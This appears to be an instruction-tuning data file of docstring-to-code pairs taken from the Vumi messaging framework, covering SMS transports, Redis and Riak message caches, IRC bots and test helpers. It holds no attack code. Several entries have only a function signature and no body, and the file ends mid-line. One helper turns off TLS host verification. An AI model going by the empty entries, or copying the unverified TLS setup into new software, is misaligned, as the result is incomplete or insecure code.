self.emit("Migrating ...") + emit_progress = lambda t: self.emit( + "%s object%s migrated." % (t, "" if t == 1 else "s")) + index_page = yield self.model.all_keys_page( + max_results=self.options["index-page-size"], + continuation=continuation) + yield self.migrate_pages(index_page, emit_progress) +[INST] Acquire a tag from the pool (returns None if no tags are avaliable).. [/INST] def jsonrpc_acquire_tag(self, pool, owner=None, reason=None): + d = self.tagpool.acquire_tag(pool, owner, reason) + return d +[INST] Acquire the specific tag (returns None if the tag is unavailable).. [/INST] def jsonrpc_acquire_specific_tag(self, tag, owner=None, reason=None): + d = self.tagpool.acquire_specific_tag(tag, owner, reason) + return d +[INST] Delete the given pool and all associated metadata and tags. +No tags from the pool may be inuse.. [/INST] def jsonrpc_purge_pool(self, pool): + return self.tagpool.purge_pool(pool) +[INST] Return a list of all available pools.. [/INST] def jsonrpc_list_pools(self): + d = self.tagpool.list_pools() + d.addCallback(list) + return d +[INST] Returns the owner of an acquired tag and why is was acquired.. [/INST] def jsonrpc_acquired_by(self, tag): + d = self.tagpool.acquired_by(tag) + d.addCallback(list) + return d +[INST] Encode a unicode_string in a specific encoding and return +the byte string.. [/INST] def encode(unicode_string, encoding, errors): +[INST] Decode a bytestring in a specific encoding and return the +unicode string. [/INST] def decode(byte_string, encoding, errors): +[INST] Create a `ParlayXClient` instance.. [/INST] def _create_client(self, config): + return ParlayXClient( + service_provider_service_id=config.service_provider_service_id, + service_provider_id=config.service_provider_id, + service_provider_password=config.service_provider_password, + short_code=config.short_code, + endpoint=config.notification_endpoint_uri, + send_uri=config.remote_send_uri, + notification_uri=config.remote_notification_uri) +[INST] Send a text message via the ParlayX client.. [/INST] def handle_outbound_message(self, message): + log.info('Sending SMS via ParlayX: %r' % (message.to_json(),)) + transport_metadata = message.get('transport_metadata', {}) + d = self._parlayx_client.send_sms( + message['to_addr'], + message['content'], + unique_correlator(message['message_id']), + transport_metadata.get('linkid')) + d.addErrback(self.handle_outbound_message_failure, message) + d.addCallback( + lambda requestIdentifier: self.publish_ack( + message['message_id'], requestIdentifier)) + return d +[INST] Handle incoming text messages from `SmsNotificationService` callbacks.. [/INST] def handle_raw_inbound_message(self, correlator, linkid, inbound_message): + log.info('Receiving SMS via ParlayX: %r: %r' % ( + correlator, inbound_message,)) + message_id = extract_message_id(correlator) + return self.publish_message( + message_id=message_id, + content=inbound_message.message, + to_addr=inbound_message.service_activation_number, + from_addr=inbound_message.sender_address, + provider='parlayx', + transport_type=self.transport_type, + transport_metadata=dict(linkid=linkid)) +[INST] Construct a unique message identifier from an existing message +identifier. + +This is necessary for the cases where a ``TransportMessage`` needs to +be transmitted, since ParlayX wants unique identifiers for all sent +messages.. [/INST] def unique_correlator(message_id, _uuid=None): + if _uuid is None: + _uuid = uuid.uuid4() + return '%s:%s' % (message_id, _uuid) +[INST] Extract the Vumi message identifier from a ParlayX correlator.. [/INST] def extract_message_id(correlator): + return correlator.split(':', 1)[0] +[INST] Creates a dummy Vas2Nets request for testing our resources with. [/INST] def create_request(params={}, path='/', method='POST'): + request = DummyRequest(path) + request.method = method + request.args = params + return request +[INST] Create and store an outbound message.. [/INST] def _create_outbound(self, tag=("pool", "tag"), by_batch=False, + content='outbound foo'): + add_kw, batch_id = yield self._maybe_batch(tag, by_batch) + msg = self.msg_helper.make_outbound(content) + msg_id = msg['message_id'] + yield self.store.add_outbound_message(msg, **add_kw) + returnValue((msg_id, msg, batch_id)) +[INST] Create and store an inbound message.. [/INST] def _create_inbound(self, tag=("pool", "tag"), by_batch=False, + content='inbound foo'): + add_kw, batch_id = yield self._maybe_batch(tag, by_batch) + msg = self.msg_helper.make_inbound( + content, to_addr="+1234567810001", transport_type="sms") + msg_id = msg['message_id'] + yield self.store.add_inbound_message(msg, **add_kw) + returnValue((msg_id, msg, batch_id)) +[INST] Format a normalized MSISDN as a URI that ParlayX will accept.. [/INST] def format_address(msisdn): + if not msisdn.startswith('+'): + raise ValueError('Only international format addresses are supported') + return 'tel:' + msisdn[1:] +[INST] Format a `datetime` instance timestamp according to ParlayX +requirements.. [/INST] def format_timestamp(when): + return when.strftime('%Y%m%d%H%M%S') +[INST] Build a time-sensitive password for a request.. [/INST] def make_password(service_provider_id, service_provider_password, + timestamp): + return hashlib.md5( + service_provider_id + + service_provider_password + + timestamp).hexdigest() +[INST] The current date and time.. [/INST] def _now(self): + return datetime.now() +[INST] Register a notification delivery endpoint with the remote ParlayX +service.. [/INST] def start_sms_notification(self): + body = NOTIFICATION_MANAGER_NS.startSmsNotification( + NOTIFICATION_MANAGER_NS.reference( + L.endpoint(self.endpoint), + L.interfaceName('notifySmsReception'), + L.correlator(self._service_correlator)), + NOTIFICATION_MANAGER_NS.smsServiceActivationNumber( + self.short_code)) + header = self._make_header() + return self.perform_soap_request( + uri=self.notification_uri, + action='', + body=body, + header=header, + expected_faults=[ServiceException]) +[INST] Deregister notification delivery with the remote ParlayX service.. [/INST] def stop_sms_notification(self): + body = NOTIFICATION_MANAGER_NS.stopSmsNotification( + L.correlator(self._service_correlator)) + header = self._make_header() + return self.perform_soap_request( + uri=self.notification_uri, + action='', + body=body, + header=header, + expected_faults=[ServiceException]) +[INST] Fetch the next page of results.. [/INST] def next_page(self): + if not self.has_next_page(): + return succeed(None) + d = deferToThread(self._index_page.next_page) + d.addCallback(type(self)) + d.addErrback(riakErrorHandler) + return d +[INST] Call a function that touches the network and wrap the result in this +class.. [/INST] def _call_and_wrap(self, func): + d = deferToThread(func) + d.addCallback(type(self)) + return d +[INST] Construct an appropriate configuration for the child worker.. [/INST] def construct_worker_config(self, worker_name): + config = deepcopy(self.config.get('defaults', {})) + config.update(self.config.get(worker_name, {})) + return config +[INST] Mark a test method as needing Riak setup.. [/INST] def needs_riak(method): + method.needs_riak = True + return method +[INST] Return a wrapper around `meth` that sets up a RiakManager.. [/INST] def wrap_riak_setup(deco, meth): + @wraps(meth) + def wrapper(self): + deco.setup_riak(self) + return meth(self) + return wrapper +[INST] Return a wrapper around `meth` that sets up a TxRiakManager.. [/INST] def wrap_txriak_setup(deco, meth): + @wraps(meth) + def wrapper(self): + d = deco.setup_txriak(self) + return d.addCallback(lambda _: meth(self)) + return wrapper +[INST] Clean up the Riak manager on the given test class.. [/INST] def cleanup_manager(deco, self): + yield self.manager.purge_all() + yield self.manager.close_manager() +[INST] Read various host and worker attributes and wrap them in a message. [/INST] def _beat(self): + attrs = self._gen_attrs_func() + msg = HeartBeatMessage(**attrs) + self.publish_message(msg) +[INST] Check if we should stop throttling, and stop throttling if we should. +At a high level, we try each throttled message in our list until all of +them have been accepted by the SMSC, at which point we stop throttling. + +In more detail. + +We recursively process our list of throttled message_ids until either +we have none left (at which point we stop throttling) or we find one we +can successfully look up in our cache. + +When we find a message we can retry, we retry it and return. We remain +throttled until the SMSC responds. If we're still throttled, the +message_id gets appended to our list and another check is scheduled for +later. If we're no longer throttled, this method gets called again +immediately. + +When there are no more throttled message_ids in our list, we stop +throttling.. [/INST] def _check_stop_throttling(self): + self._unthrottle_delayedCall = None + if not self.is_bound(): + self.log.msg("Can't check throttling while unbound, trying later.") + self.check_stop_throttling() + return + if not self._throttled_pdus: + self.log.msg("No more throttled messages to retry.") + yield self.stop_throttling() + return + seq_no = self._throttled_pdus.pop(0) + pdu_data = yield self.message_stash.get_cached_pdu(seq_no) + yield self.retry_throttled_pdu(pdu_data, seq_no) +[INST] Submit a concatenated SMS to the SMSC using the optional +SAR parameter names in the various PDUS.. [/INST] def submit_csm_sar( + self, vumi_message_id, destination_addr, + reference_rollover=0x10000, **pdu_params): + split_msg = self.csm_split_message(pdu_params.pop('short_message')) + if len(split_msg) == 1: + sequence_numbers = yield self.submit_sm( + vumi_message_id, destination_addr, short_message=split_msg[0], + **pdu_params) + returnValue(sequence_numbers) + optional_parameters = pdu_params.pop('optional_parameters', {}).copy() + ref_num = yield self.sequence_generator.next() + sequence_numbers = [] + yield self.message_stash.init_multipart_info( + vumi_message_id, len(split_msg)) + for i, msg in enumerate(split_msg): + pdu_params = pdu_params.copy() + optional_parameters.update({ + 'sar_msg_ref_num': (ref_num % reference_rollover), + 'sar_total_segments': len(split_msg), + 'sar_segment_seqnum': i + 1, + }) + sequence_number = yield self.submit_sm( + vumi_message_id, destination_addr, short_message=msg, + optional_parameters=optional_parameters, **pdu_params) + sequence_numbers.extend(sequence_number) + returnValue(sequence_numbers) +[INST] Submit a concatenated SMS to the SMSC using user data headers (UDH) +in the message content.. [/INST] def submit_csm_udh(self, vumi_message_id, destination_addr, **pdu_params): + if 'esm_class' in pdu_params: + raise EsmeProtocolError( + 'Cannot specify esm_class, GSM spec sets this at 0x40 ' + 'for concatenated messages using UDH.') + pdu_params = pdu_params.copy() + split_msg = self.csm_split_message(pdu_params.pop('short_message')) + if len(split_msg) == 1: + sequence_numbers = yield self.submit_sm( + vumi_message_id, destination_addr, short_message=split_msg[0], + **pdu_params) + returnValue(sequence_numbers) + ref_num = yield self.sequence_generator.next() + sequence_numbers = [] + yield self.message_stash.init_multipart_info( + vumi_message_id, len(split_msg)) + for i, msg in enumerate(split_msg): + pdu_params['esm_class'] = 0x40 + udh = ''.join([ + '\05', + '\00', + '\03', + chr(ref_num % 0xFF), + chr(len(split_msg)), + chr(i + 1), + ]) + short_message = udh + msg + sequence_number = yield self.submit_sm( + vumi_message_id, destination_addr, short_message=short_message, + **pdu_params) + sequence_numbers.extend(sequence_number) + returnValue(sequence_numbers) +[INST] Publish datapoints to a broker.. [/INST] def send_datapoints(self, exchange, queue, datapoints): + msg = MetricMessage() + msg.extend(datapoints) + self._broker.publish_message(exchange, queue, msg) +[INST] Retrieve datapoints from a broker.. [/INST] def recv_datapoints(self, exchange, queue): + vumi_msgs = self._broker.get_messages(exchange, queue) + msgs = [MetricMessage.from_dict(vm.payload) for vm in vumi_msgs] + return [msg.datapoints() for msg in msgs] +[INST] Return the channel if the recipient is a channel. +Otherwise return None.. [/INST] def channel(self): + if self.recipient[:1] in ('#', '&', '$'): + return self.recipient + return None +[INST] Called when bot has succesfully signed on to server.. [/INST] def signedOn(self): + log.msg("Attempting to join channels: %r" % (self.channels,)) + for channel in self.channels: + self.join(channel) +[INST] This will get called when the bot receives a message.. [/INST] def privmsg(self, sender, recipient, message): + irc_msg = IrcMessage(sender, 'PRIVMSG', recipient, message, + self.nickname) + self.publish_message(irc_msg) +[INST] This will get called when the bot receives a notice.. [/INST] def noticed(self, sender, recipient, message): + irc_msg = IrcMessage(sender, 'NOTICE', recipient, message, + self.nickname) + self.publish_message(irc_msg) +[INST] This will get called when the bot sees someone do an action.. [/INST] def action(self, sender, recipient, message): + irc_msg = IrcMessage(sender, 'ACTION', recipient, message, + self.nickname) + self.publish_message(irc_msg) +[INST] Called when an IRC user changes their nickname.. [/INST] def irc_NICK(self, prefix, params): + old_nick = prefix.partition('!')[0] + new_nick = params[0] + log.msg("Nick changed from %r to %r" % (old_nick, new_nick)) +[INST] Generate an altered version of a nickname that caused a collision in an +effort to create an unused related name for subsequent registration.. [/INST] def alterCollidedNick(self, nickname): + return nickname + '^' +[INST] Non-recursively overlay a set of configuration dictionaries. [/INST] def overlay_configs(*configs): + config = {} + for overlay in configs: + config.update(overlay) + return config +[INST] Parse an (usually) optional YAML config file.. [/INST] def read_yaml_config(config_file, optional=True): + if optional and config_file is None: + return {} + with file(config_file, 'r') as stream: + return yaml.load(stream, Loader=SafeLoaderWithInclude) +[INST] Set a worker configuration option (overrides values +specified in the file passed to --config).. [/INST] def opt_set_option(self, keyvalue): + key, _sep, value = keyvalue.partition(':') + self.set_options[key] = value +[INST] Print out a usage message for the worker-class and exit. [/INST] def do_worker_help(self): + worker_class = load_class_by_string(self.worker_class) + self.emit(worker_class.__doc__) + config_class = getattr(worker_class, 'CONFIG_CLASS', None) + if config_class is not None: + self.emit(config_class.__doc__) + self.emit("") + self.exit() +[INST] Build a `MockResponse` containing a SOAP envelope.. [/INST] def build(cls, code, body, header=None): + return cls( + code=code, + delivered_body=tostring(soap_envelope(body, header))) +[INST] Helper for creating an ``notifySmsDeliveryReceipt`` element.. [/INST] def create_sms_delivery_receipt(correlator, address, delivery_status): + return NOTIFICATION_NS.notifySmsDeliveryReceipt( + NOTIFICATION_NS.correlator(correlator), + NOTIFICATION_NS.deliveryStatus( + L.address(format_address(normalize_address(address))), + L.deliveryStatus(delivery_status.name))) +[INST] Logs a message via vumi.log . +Sub-class should override this if they wish to log messages +elsewhere. The `api` parameter is provided for use by such +sub-classes. + +The `log` method should always return a deferred.. [/INST] def log(self, api, msg, level): + return succeed(log.msg(msg, logLevel=level)) +[INST] Use ClientContextFactory directly and set the method if necessary. +This will perform no host verification at all.. [/INST] def _get_noverify_context(self): + from twisted.internet.ssl import ClientContextFactory + context_factory = ClientContextFactory() + if self.ssl_method is not None: + context_factory.method = self.ssl_method + return context_factory.getContext() +[INST] Turn an ElementTree element into an object with named params. +Not recursive!. [/INST] def receipt_to_namedtuple(element): + d = receipt_element_to_dict(element) + klass = namedtuple(element.tag, d.keys()) + return klass._make(d.values()) +[INST] Returns an :class:`SmsSyncMsgInfo` instance for this request. +May return a deferred that yields the actual result to its callback.. [/INST] def msginfo_for_request(self, request): + raise NotImplementedError("Sub-classes should implement" + " msginfo_for_request") +[INST] Returns an :class:`SmsSyncMsgInfo` instance for this outbound +message. + +May return a deferred that yields the actual result to its callback.. [/INST] def msginfo_for_message(self, msg): + raise NotImplementedError("Sub-classes should implement" + " msginfo_for_message") +[INST] Update an outbound message's payload's transport_metadata to allow +msginfo to be reconstructed from replies.. [/INST] def add_msginfo_metadata(self, payload, msginfo): + raise NotImplementedError("Sub-class should implement" + " add_msginfo_metadata") +[INST] Gathers pending messages and sends a response including them.. [/INST] def _respond_with_pending_messages(self, msginfo, message_id, **kw): + outbound_ids = [] + outbound_messages = [] + account_key = self.key_for_account(msginfo.account_id) + while True: + msg_json = yield self.redis.lpop(account_key) + if msg_json is None: + break + msg = TransportUserMessage.from_json(msg_json) + outbound_ids.append(msg['message_id']) + outbound_messages.append({'to': msg['to_addr'], + 'message': msg['content'] or ''}) + yield self._send_response(message_id, messages=outbound_messages, **kw) + for outbound_id in outbound_ids: + yield self.publish_ack(user_message_id=outbound_id, + sent_message_id=outbound_id) +[INST] This is overridden in a subclass.. [/INST] def _get_transport_config(self, config): + cfg = self.default_config.copy() + cfg.update(config) + return cfg +[INST] The test cases assume the new config, this flattens the +config key word arguments value to match an old config +layout without the processor configs.. [/INST] def _get_transport_config(self, config): + cfg = self.default_config.copy() + processor_config_keys = [ + 'submit_short_message_processor_config', + 'deliver_short_message_processor_config', + 'delivery_report_processor_config', + ] + for config_key in processor_config_keys: + processor_config = config.pop(config_key, {}) + for name, value in processor_config.items(): + cfg[name] = value + cfg.update(config) + return cfg +[INST] Create a SOAP body containing a SOAP fault.. [/INST] def _make_fault(*a, **kw): + return SOAP_ENV.Body(soap_fault(*a, **kw)) +[INST] Construct a manager from a dictionary of options.. [/INST] def _manager_from_config(cls, config, manager_config): + return cls(VumiRedis(**config), **manager_config) +[INST] Delete *ALL* keys whose names start with this manager's key prefix. +Use only in tests.. [/INST] def _purge_all(self): + for key in self.keys(): + self.delete(key) +[INST] A version of getPage that uses QuietHTTPClientFactory.. [/INST] def quiet_get_page(url, contextFactory=None, *args, **kwargs): + return _makeGetterFactory( + url, + QuietHTTPClientFactory, + contextFactory=contextFactory, + *args, **kwargs).deferred +[INST] Construct a custom raven client and transport-set pair. +The raven client assumes that sends via transports return success or +failure immediate in a blocking fashion and doesn't provide transports +access to the client. + +We circumvent this by constructing a once-off transport class and +raven client pair that work together. Instances of the transport feed +information back success and failure back to the client instance once +deferreds complete. + +Pull-requests with better solutions welcomed.. [/INST] def vumi_raven_client(dsn, log_context_sentinel=None): + import raven + from raven.transport.base import TwistedHTTPTransport + from raven.transport.registry import TransportRegistry + remaining_deferreds = set() + if log_context_sentinel is None: + log_context_sentinel = DEFAULT_LOG_CONTEXT_SENTINEL + log_context = {log_context_sentinel: True} + class VumiRavenHTTPTransport(TwistedHTTPTransport): + scheme = ['http', 'https'] + def _get_page(self, data, headers): + d = quiet_get_page(self._url, method='POST', postdata=data, + headers=headers) + self._track_deferred(d) + self._track_client_state(d) + return d + def _track_deferred(self, d): + remaining_deferreds.add(d) + d.addBoth(self._untrack_deferred, d) + def _untrack_deferred(self, result, d): + remaining_deferreds.discard(d) + return result + def _track_client_state(self, d): + d.addCallbacks(self._set_client_success, self._set_client_fail) + def _set_client_success(self, result): + client.state.set_success() + return result + def _set_client_fail(self, result): + client.state.set_fail() + return result + def send(self, data, headers): + d = self._get_page(data, headers) + d.addErrback(lambda f: log.err(f, **log_context)) + class VumiRavenClient(raven.Client): + _registry = TransportRegistry(transports=[ + VumiRavenHTTPTransport + ]) + def teardown(self): + return DeferredList(remaining_deferreds) + client = VumiRavenClient(dsn) + return client +[INST] Run once for each key. +May return either the name of the key (if the key should +be processed by later tasks), the new name of the key (if +the key was renamed and should be processed by later tasks) +or ``None`` (if the key has been deleted or should not be +processed by further tasks).. [/INST] def process_key(self, key): + return key +[INST] Print the given string and then a newline.. [/INST] def emit(self, s): + self.stdout.write(s) + self.stdout.write("\n") +[INST] Apply all tasks to all keys.. [/INST] def run(self): + for task in self.tasks: + task.init(self, self.redis) + for task in self.tasks: + task.before() + for key in scan_keys(self.redis, self.match_pattern): + for task in self.tasks: + key = task.process_key(key) + if key is None: + break + for task in self.tasks: + task.after() +[INST] Add any needed HTTP headers to the request. +Often used to set the Content-Type header.. [/INST] def add_http_headers(request): +[INST] Write any header bytes that need to be written to the request before +messages.. [/INST] def write_row_header(request): +[INST] Perform teardown required for router.. [/INST] def teardown_routing(self): + pass +[INST] Dispatch an inbound user message to a publisher.. [/INST] def dispatch_inbound_message(self, msg): + raise NotImplementedError() +[INST] Dispatch an event to a publisher.. [/INST] def dispatch_inbound_event(self, msg): + raise NotImplementedError() +[INST] Dispatch an outbound user message to a publisher.. [/INST] def dispatch_outbound_message(self, msg): + raise NotImplementedError() +[INST] Explicitly throw away events, because transports can't receive them.. [/INST] def dispatch_inbound_event(self, msg): + pass +[INST] If we're only hooking transports up to each other, there are no +outbound messages.. [/INST] def dispatch_outbound_message(self, msg): + pass +[INST] Start and return the given MockHttpServer with suitable cleanup.. [/INST] def start_mock_server(self, mock_server): + self.add_cleanup(mock_server.stop) + d = mock_server.start() + return d.addCallback(lambda _: mock_server) +[INST] Creates a manager, purges all the riak data with it, then closes it.. [/INST] def purge_txriak(self): + manager = self.create_txriak_manager() + yield manager.purge_all() + yield manager.close_manager() +[INST] Creates and returns a TxRiakManager, handling cleanup.. [/INST] def create_txriak_manager(self): + try: + from vumi.persist.txriak_manager import TxRiakManager + except ImportError, e: + import_skip(e, 'riak', 'riak') + self.add_cleanup(self.purge_txriak) + return TxRiakManager.from_config({'bucket_prefix': 'test.'}) +[INST] Creates a manager, purges all the riak data with it, then closes it.. [/INST] def purge_riak(self): + manager = self.create_riak_manager() + manager.purge_all() + manager.close_manager() +[INST] Creates and returns a RiakManager, handling cleanup.. [/INST] def create_riak_manager(self): + try: + from vumi.persist.riak_manager import RiakManager + except ImportError, e: + import_skip(e, 'riak', 'riak') + self.add_cleanup(self.purge_riak) + return RiakManager.from_config({'bucket_prefix': 'test.'}) +[INST] Set the TTL on multipart info hash to something small. We don't delete +this in case there's still an in-flight operation that will recreate it +without a TTL.. [/INST] def expire_multipart_info(self, message_id): + expiry = self.config.completed_multipart_info_expiry + return self.redis.expire(multipart_info_key(message_id), expiry) +[INST] Does various setup work in order to be able to accurately +store cached data for a batch_id. + +A call to this isn't necessary but good for general house keeping.. [/INST] def batch_start(self, batch_id, use_counters=True): + yield self.redis.sadd(self.batch_key(), batch_id) + yield self.init_status(batch_id) + if use_counters: + yield self.redis.set(self.inbound_count_key(batch_id), 0) + yield self.redis.set(self.outbound_count_key(batch_id), 0) + yield self.redis.set(self.event_count_key(batch_id), 0) +[INST] Removes all cached values for the given batch_id, useful before +a reconciliation happens to ensure that we start from scratch. + +This will reset all counters back to zero and will increment +them as messages are received. If your UI depends on your +cached values your UI values might be off while the +reconciliation is taking place.. [/INST] def clear_batch(self, batch_id): + yield self.redis.delete(self.inbound_key(batch_id)) + yield self.redis.delete(self.inbound_count_key(batch_id)) + yield self.redis.delete(self.outbound_key(batch_id)) + yield self.redis.delete(self.outbound_count_key(batch_id)) + yield self.redis.delete(self.event_key(batch_id)) + yield self.redis.delete(self.event_count_key(batch_id)) + yield self.redis.delete(self.status_key(batch_id)) + yield self.redis.delete(self.to_addr_key(batch_id)) + yield self.redis.delete(self.from_addr_key(batch_id)) + yield self.redis.srem(self.batch_key(), batch_id) +[INST] Add an outbound message to the cache for the given batch_id. [/INST] def add_outbound_message(self, batch_id, msg): + timestamp = self.get_timestamp(msg['timestamp']) + yield self.add_outbound_message_key( + batch_id, msg['message_id'], timestamp) + yield self.add_to_addr(batch_id, msg['to_addr']) +[INST] Add a message key, weighted with the timestamp to the batch_id.. [/INST] def add_outbound_message_key(self, batch_id, message_key, timestamp): + new_entry = yield self.redis.zadd(self.outbound_key(batch_id), **{ + message_key.encode('utf-8'): timestamp, + }) + if new_entry: + yield self.increment_event_status(batch_id, 'sent') + uses_counters = yield self.uses_counters(batch_id) + if uses_counters: + yield self.redis.incr(self.outbound_count_key(batch_id)) + yield self.truncate_outbound_message_keys(batch_id) +[INST] Add a count to all outbound message counters. (Used for recon.). [/INST] def add_outbound_message_count(self, batch_id, count): + yield self.increment_event_status(batch_id, 'sent', count) + yield self.redis.incr(self.outbound_count_key(batch_id), count) +[INST] Add a count to all relevant event counters. (Used for recon.). [/INST] def add_event_count(self, batch_id, status, count): + yield self.increment_event_status(batch_id, status, count) + yield self.redis.incr(self.event_count_key(batch_id), count) +[INST] Add an event to the cache for the given batch_id. [/INST] def add_event(self, batch_id, event): + event_id = event['event_id'] + timestamp = self.get_timestamp(event['timestamp']) + new_entry = yield self.add_event_key(batch_id, event_id, timestamp) + if new_entry: + event_type = event['event_type'] + yield self.increment_event_status(batch_id, event_type) + if event_type == 'delivery_report': + yield self.increment_event_status( + batch_id, '%s.%s' % (event_type, event['delivery_status'])) +[INST] Add the event key to the set of known event keys. +Returns 0 if the key already exists in the set, 1 if it doesn't.. [/INST] def add_event_key(self, batch_id, event_key, timestamp): + uses_event_counters = yield self.uses_event_counters(batch_id) + if uses_event_counters: + new_entry = yield self.redis.zadd(self.event_key(batch_id), **{ + event_key.encode('utf-8'): timestamp, + }) + if new_entry: + yield self.redis.incr(self.event_count_key(batch_id)) + yield self.truncate_event_keys(batch_id) + returnValue(new_entry) + else: + returnValue(False) + new_entry = yield self.redis.sadd( + self.event_key(batch_id), event_key) + returnValue(new_entry) +[INST] Increment the status for the given event_type for the given batch_id.. [/INST] def increment_event_status(self, batch_id, event_type, count=1): + return self.redis.hincrby(self.status_key(batch_id), event_type, count) +[INST] Add an inbound message to the cache for the given batch_id. [/INST] def add_inbound_message(self, batch_id, msg): + timestamp = self.get_timestamp(msg['timestamp']) + yield self.add_inbound_message_key( + batch_id, msg['message_id'], timestamp) + yield self.add_from_addr(batch_id, msg['from_addr']) +[INST] Add a message key, weighted with the timestamp to the batch_id. [/INST] def add_inbound_message_key(self, batch_id, message_key, timestamp): + new_entry = yield self.redis.zadd(self.inbound_key(batch_id), **{ + message_key.encode('utf-8'): timestamp, + }) + if new_entry: + uses_counters = yield self.uses_counters(batch_id) + if uses_counters: + yield self.redis.incr(self.inbound_count_key(batch_id)) + yield self.truncate_inbound_message_keys(batch_id) +[INST] Add a count to all inbound message counters. (Used for recon.). [/INST] def add_inbound_message_count(self, batch_id, count): + yield self.redis.incr(self.inbound_count_key(batch_id), count) +[INST] Add a from_addr to this batch_id using Redis's HyperLogLog +functionality. Generally this information is set when +`add_inbound_message()` is called.. [/INST] def add_from_addr(self, batch_id, from_addr): + return self.redis.pfadd( + self.from_addr_key(batch_id), from_addr.encode('utf-8')) +[INST] Return count of the unique from_addrs in this batch. Note that the +returned count is not exact.. [/INST] def count_from_addrs(self, batch_id): + return self.redis.pfcount(self.from_addr_key(batch_id)) +[INST] Return count of the unique to_addrs in this batch. Note that the +returned count is not exact.. [/INST] def count_to_addrs(self, batch_id): + return self.redis.pfcount(self.to_addr_key(batch_id)) +[INST] Return the count of the unique inbound message keys for this batch_id. [/INST] def count_inbound_message_keys(self, batch_id): + if not (yield self.uses_counters(batch_id)): + returnValue((yield self.inbound_message_keys_size(batch_id))) + count = yield self.inbound_message_count(batch_id) + returnValue(count) +[INST] Return the count of the unique outbound message keys for this batch_id. [/INST] def count_outbound_message_keys(self, batch_id): + if not (yield self.uses_counters(batch_id)): + returnValue((yield self.outbound_message_keys_size(batch_id))) + count = yield self.outbound_message_count(batch_id) + returnValue(count) +[INST] Return the count of the unique event keys for this batch_id. [/INST] def count_event_keys(self, batch_id): + uses_event_counters = yield self.uses_event_counters(batch_id) + if uses_event_counters: + count = yield self.event_count(batch_id) + returnValue(count) + else: + count = yield self.redis.scard(self.event_key(batch_id)) + returnValue(count) +[INST] Calculate the number of messages seen in the last `sample_time` amount +of seconds.. [/INST] def count_inbound_throughput(self, batch_id, sample_time=300): + last_seen = yield self.redis.zrange( + self.inbound_key(batch_id), 0, 0, desc=True, + withscores=True) + if not last_seen: + returnValue(0) + [(latest, timestamp)] = last_seen + count = yield self.redis.zcount( + self.inbound_key(batch_id), timestamp - sample_time, timestamp) + returnValue(int(count)) +[INST] Calculate the number of messages seen in the last `sample_time` amount +of seconds.. [/INST] def count_outbound_throughput(self, batch_id, sample_time=300): + last_seen = yield self.redis.zrange( + self.outbound_key(batch_id), 0, 0, desc=True, withscores=True) + if not last_seen: + returnValue(0) + [(latest, timestamp)] = last_seen + count = yield self.redis.zcount( + self.outbound_key(batch_id), timestamp - sample_time, timestamp) + returnValue(int(count)) +[INST] Store the inbound query results for a query that was started with +`start_inbound_query`. Internally this grabs the timestamps from +the cache (there is an assumption that it has already been reconciled) +and orders the results accordingly.. [/INST] def store_query_results(self, batch_id, token, keys, direction, + ttl=None): + ttl = ttl or self.DEFAULT_SEARCH_RESULT_TTL + result_key = self.search_result_key(batch_id, token) + if direction == 'inbound': + score_set_key = self.inbound_key(batch_id) + elif direction == 'outbound': + score_set_key = self.outbound_key(batch_id) + else: + raise MessageStoreCacheException('Invalid direction') + for key in keys: + timestamp = yield self.redis.zscore(score_set_key, key) + yield self.redis.zadd(result_key, **{ + key.encode('utf-8'): timestamp, + }) + yield self.redis.expire(result_key, ttl) + yield self.redis.srem(self.search_token_key(batch_id), token) +[INST] Handle a delivery report PDU from the networks. + +All processors should implement this even if it does nothing.. [/INST] def handle_delivery_report_pdu(pdu_data): +[INST] Handle an unpacked delivery report from the networks. +This can happen with certain SMSCs that don't set the necessary +delivery report flags on a PDU. As a result we only detect the DR by +matching a received SM against a predefined regex.. [/INST] def handle_delivery_report_content(pdu_data): +[INST] Handle a short message PDU from the networks after it has been +re-assembled and decoded. + + + +All processors should implement this even if it does nothing.. [/INST] def handle_short_message_pdu(pdu): +[INST] Handle a part of a multipart PDU. + +All processors should implement this even if it does nothing.. [/INST] def handle_multipart_pdu(pdu): +[INST] Handle a USSD pdu. + +It is likely that the USSD bits of this Interface will move to +its own Interface implementation once work starts on an USSD over +SMPP implementation. + +All processors should implement this even if it does nothing.. [/INST] def handle_ussd_pdu(pdu): +[INST] Decode a byte string and return the unicode string for it according +to the specified data coding.. [/INST] def dcs_decode(obj, data_coding): +[INST] Handle an outbound message from Vumi by calling the appropriate +methods on the service with the appropriate parameters. + +These parameters and values can differ per MNO. + +Should return a Deferred that fires with a the list of sequence_numbers +returning from the submit_sm calls.. [/INST] def handle_raw_outbound_message(vumi_message, smpp_service): +[INST] Schedule a message delivery run. +Returns a deferred that will fire when all deliverable +messages have been delivered and processed by their consumers. +This is useful for manually triggering a delivery run from +inside a test.. [/INST] def kick_delivery(self): + if self._delivering is None: + self._delivering = { + 'deferred': Deferred(), + 'count': 0, + } + self._delivering['count'] += 1 + reactor.callLater(0, self.deliver_to_channels) + return self.wait_delivery() +[INST] Wait for the current message delivery run (if any) to finish. +Returns a deferred that will fire when the broker is finished +delivering any messages from the current run. This should not +leave any messages undelivered, because basic_publish() kicks +off a delivery run. + +Each call returns a new deferred to avoid callback chain ordering +issues when several things want to wait for delivery. + +This method should be called during test teardown to make +sure there are no pending delivery cleanups that will cause a +dirty reactor race.. [/INST] def wait_delivery(self): + d = Deferred() + if self._delivering is None: + d.callback(None) + else: + self._delivering['deferred'].chainDeferred(d) + return d +[INST] Notify the broker that a message has been processed, in order +to make delivery sane.. [/INST] def message_processed(self): + self.broker.message_processed() +[INST] Register cleanup and perform setup for a helper object.. [/INST] def add_helper(helper_object, *args, **kwargs): +[INST] Mark a method as being suitable for automatic proxy generation. +See :func:`generate_proxies` for usage.. [/INST] def proxyable(func): + func.proxyable = True + return func +[INST] We can't necessarily use TestCase.successResultOf because our Twisted might +not be new enough. This is a standalone copy with some minor message +differences.. [/INST] def success_result_of(d): + results = [] + d.addBoth(results.append) + if not results: + raise FailTest("No result available for deferred: %r" % (d,)) + if isinstance(results[0], Failure): + raise FailTest("Expected success from deferred %r, got failure: %r" % ( + d, results[0])) + return results[0] +[INST] Poll the reactor for unclosed connections and wait for them to close. +Properly waiting for all connections to finish closing requires hooking +into :meth:`Protocol.connectionLost` in both client and server. Since +this isn't practical in all cases, we check the reactor for any open +connections and wait a bit for them to finish closing if we find any. + +This will only wait for connections that close on their own. Any +connections that have been left open will stay open (unless they +time out or something) and will leave the reactor dirty after we +stop waiting.. [/INST] def _check_reactor_things(self): + from twisted.internet import reactor + yield deferLater(reactor, 0, lambda: None) + for i in range(self.reactor_check_iterations): + internal_readers = getattr(reactor, 